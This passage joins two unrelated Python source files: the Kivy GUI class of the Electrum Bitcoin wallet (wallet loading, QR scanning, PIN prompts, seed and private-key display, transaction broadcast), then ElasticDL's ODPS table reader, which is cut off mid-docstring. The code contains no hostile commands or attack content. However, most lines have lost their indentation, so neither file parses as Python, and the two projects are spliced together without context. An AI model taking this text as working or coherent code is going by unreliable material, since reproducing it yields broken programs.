options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Tracks the current screen orientation. Can be one of `landscape` or
    `portrait`.
    :data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
        Logger.info('Time to on_start: {} <<<<<<<<'.format(time.perf_counter()))  # time.clock() was removed in Python 3.8
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum: Wallet not found or action needed. Launching install wizard')
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Electrum. This function performs the
        basic tasks of setting up the UI.
        '''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast_transaction(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg[:500] if msg else _('There was an error broadcasting the transaction.')
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
odps_io.py
|
# Copyright 2020 The ElasticDL Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import time
from multiprocessing import Process, Queue
import odps
from odps import ODPS
from odps.models import Schema
from elasticdl.python.common.constants import MaxComputeConfig
from elasticdl.python.common.log_utils import default_logger as logger
def _nested_list_size(nested_list):
"""
Obtains the memory size for the nested list.
"""
total = sys.getsizeof(nested_list)
for i in nested_list:
if isinstance(i, list):
total += _nested_list_size(i)
else:
total += sys.getsizeof(i)
return total
def _configure_odps_options(endpoint, options=None):
if endpoint is not None and endpoint != "":
odps.options.retry_times = options.get("odps.options.retry_times", 5)
odps.options.read_timeout = options.get(
"odps.options.read_timeout", 200
)
odps.options.connect_timeout = options.get(
"odps.options.connect_timeout", 200
)
odps.options.tunnel.endpoint = options.get(
"odps.options.tunnel.endpoint", None
)
if (
odps.options.tunnel.endpoint is None
and "service.odps.aliyun-inc.com/api" in endpoint
):
odps.options.tunnel.endpoint = "http://dt.odps.aliyun-inc.com"
def is_odps_configured():
return all(
k in os.environ
for k in (
MaxComputeConfig.PROJECT_NAME,
MaxComputeConfig.ACCESS_ID,
MaxComputeConfig.ACCESS_KEY,
)
)
class ODPSReader(object):
def __init__(
self,
project,
access_id,
access_key,
endpoint,
table,
partition=None,
num_processes=None,
options=None,
transform_fn=None,
columns=None,
):
"""
Constructs a `ODPSReader` instance.
Args:
project: Name of the ODPS project.
access_id: ODPS user access ID.
access_key: ODPS user access key.
endpoint: ODPS cluster endpoint.
table: ODPS table name.
            partition: ODPS table's partition.
            options: Other options passed to the ODPS context, e.g. the
                tunnel endpoint via "odps.options.tunnel.endpoint".
            num_processes: Number of parallel processes on this worker.
                If `None`, use the number of cores.
            transform_fn: Customized transform function.
            columns: List of table column names.
"""
super(ODPSReader, self).__init__()
if table.find(".") > 0:
project, table = table.split(".")
if options is None:
options = {}
self._project = project
self._access_id = access_id
self._access_key = access_key
self._endpoint = endpoint
self._table = table
self._partition = partition
self._num_processes = num_processes
_configure_odps_options(self._endpoint, options)
self._odps_table = ODPS(
self._access_id, self._access_key, self._project, self._endpoint,
).get_table(self._table)
self._transform_fn = transform_fn
self._columns = columns
def reset(self, shards, shard_size):
"""
The parallel reader launches multiple worker processes to read
records from an ODPS table and applies `transform_fn` to each record.
If `transform_fn` is not set, the transform stage will be skipped.
        Worker process:
        1. get a shard from the index queue; the shard is a pair
           (start, count) of rows in the ODPS table
        2. read the records from the ODPS table
        3. apply `transform_fn` to each record
        4. put the records into the result queue
        Main process:
        1. call `reset` to create a number of shards given an input shard
        2. put shards into the workers' index queues in a round-robin way
        3. call `get_records` to get transformed data from the result queue
        4. call `stop` to stop the workers
"""
self._result_queue = Queue()
self._index_queues = []
self._workers = []
self._shards = []
self._shard_idx = 0
self._worker_idx = 0
for i in range(self._num_processes):
index_queue = Queue()
self._index_queues.append(index_queue)
p = Process(target=self._worker_loop, args=(i,))
p.daemon = True
p.start()
self._workers.append(p)
self._create_shards(shards, shard_size)
for i in range(2 * self._num_processes):
self._put_index()
def get_shards_count(self):
return len(self._shards)
def get_records(self):
data = self._result_queue.get()
self._put_index()
return data
def stop(self):
for q in self._index_queues:
q.put((None, None))
def _worker_loop(self, worker_id):
while True:
index = self._index_queues[worker_id].get()
if index[0] is None and index[1] is None:
break
records = []
for record in self.record_generator_with_retry(
start=index[0],
end=index[0] + index[1],
columns=self._columns,
transform_fn=self._transform_fn,
):
records.append(record)
self._result_queue.put(records)
def _create_shards(self, shards, shard_size):
start = shards[0]
count = shards[1]
m = count // shard_size
n = count % shard_size
for i in range(m):
self._shards.append((start + i * shard_size, shard_size))
if n != 0:
self._shards.append((start + m * shard_size, n))
def _next_worker_id(self):
cur_id = self._worker_idx
self._worker_idx += 1
if self._worker_idx == self._num_processes:
self._worker_idx = 0
return cur_id
def _put_index(self):
# put index to the index queue of each worker
# with Round-Robin way
if self._shard_idx < len(self._shards):
worker_id = self._next_worker_id()
shard = self._shards[self._shard_idx]
self._index_queues[worker_id].put(shard)
self._shard_idx += 1
def read_batch(self, start, end, columns=None, max_retries=3):
"""
Read ODPS table in chosen row range [ `start`, `end` ) with the
specified columns `columns`.
Args:
start: The row index to start reading.
end: The row index to end reading.
columns: The list of column to read.
max_retries : The maximum number of retries in case of exceptions.
Returns:
Two-dimension python list with shape: (end - start, len(columns))
"""
retry_count = 0
if columns is None:
columns = self._odps_table.schema.names
while retry_count < max_retries:
try:
record_gen = self.record_generator(start, end, columns)
return [record for record in record_gen]
except Exception as e:
if retry_count >= max_retries:
raise Exception("Exceeded maximum number of retries")
logger.warning(
"ODPS read exception {} for {} in {}."
"Retrying time: {}".format(
e, columns, self._table, retry_count
)
)
time.sleep(5)
retry_count += 1
def record_generator_with_retry(
self, start, end, columns=None, max_retries=3, transform_fn=None
):
"""Wrap record_generator with retry to avoid ODPS table read failure
due to network instability.
"""
retry_count = 0
while retry_count < max_retries:
try:
for record in self.record_generator(start, end, columns):
if transform_fn:
record = transform_fn(record)
yield record
break
except Exception as e:
if retry_count >= max_retries:
raise Exception("Exceeded maximum number of retries")
logger.warning(
"ODPS read exception {} for {} in {}."
"Retrying time: {}".format(
e, columns, self._table, retry_count
)
)
time.sleep(5)
retry_count += 1
def record_generator(self, start, end, columns=None):
"""Generate records from an ODPS table
"""
if columns is None:
columns = self._odps_table.schema.names
with self._odps_table.open_reader(
partition=self._partition, reopen=False
) as reader:
for record in reader.read(
start=start, count=end - start, columns=columns
):
yield [str(record[column]) for column in columns]
def get_table_size(self, max_retries=3):
retry_count = 0
while retry_count < max_retries:
try:
with self._odps_table.open_reader(
partition=self._partition
) as reader:
return reader.count
except Exception as e:
if retry_count >= max_retries:
raise Exception("Exceeded maximum number of retries")
logger.warning(
"ODPS read exception {} to get table size."
"Retrying time: {}".format(e, retry_count)
)
time.sleep(5)
retry_count += 1
def _estimate_cache_batch_count(self, columns, table_size, batch_size):
"""
        This function calculates an appropriate cache batch size for
        downloads from ODPS. If the batch size is small, we would repeatedly
        create HTTP connections and download small chunks of data. To read
        more efficiently, we read `batch_size * cache_batch_count` lines of
        data at a time. However, determining a proper `cache_batch_count` is
        non-trivial; our heuristic is to cap the size of each download.
"""
sample_size = 10
max_cache_batch_count = 50
upper_bound = 20 * 1000000
if table_size < sample_size:
return 1
batch = self.read_batch(start=0, end=sample_size, columns=columns)
size_sample = _nested_list_size(batch)
size_per_batch = size_sample * batch_size / sample_size
# `size_per_batch * cache_batch_count` will
# not exceed upper bound but will always greater than 0
cache_batch_count_estimate = max(int(upper_bound / size_per_batch), 1)
return min(cache_batch_count_estimate, max_cache_batch_count)
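# A minimal, hypothetical usage sketch based on the `reset` docstring above
# (placeholder project/credentials/table names, not real values). The main
# process creates shards, drains the result queue once per shard, then stops
# the worker processes:
#
#   reader = ODPSReader(
#       project="my_project", access_id="my_id", access_key="my_key",
#       endpoint="http://service.odps.example/api", table="my_table",
#       num_processes=2,
#   )
#   reader.reset(shards=(0, 10000), shard_size=1000)  # rows [0, 10000) in 10 shards
#   for _ in range(reader.get_shards_count()):
#       records = reader.get_records()  # one (possibly transformed) shard per call
#       ...                             # consume the records
#   reader.stop()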
class ODPSWriter(object):
def __init__(
self,
project,
access_id,
access_key,
endpoint,
table,
columns=None,
column_types=None,
options=None,
):
"""
Constructs a `ODPSWriter` instance.
Args:
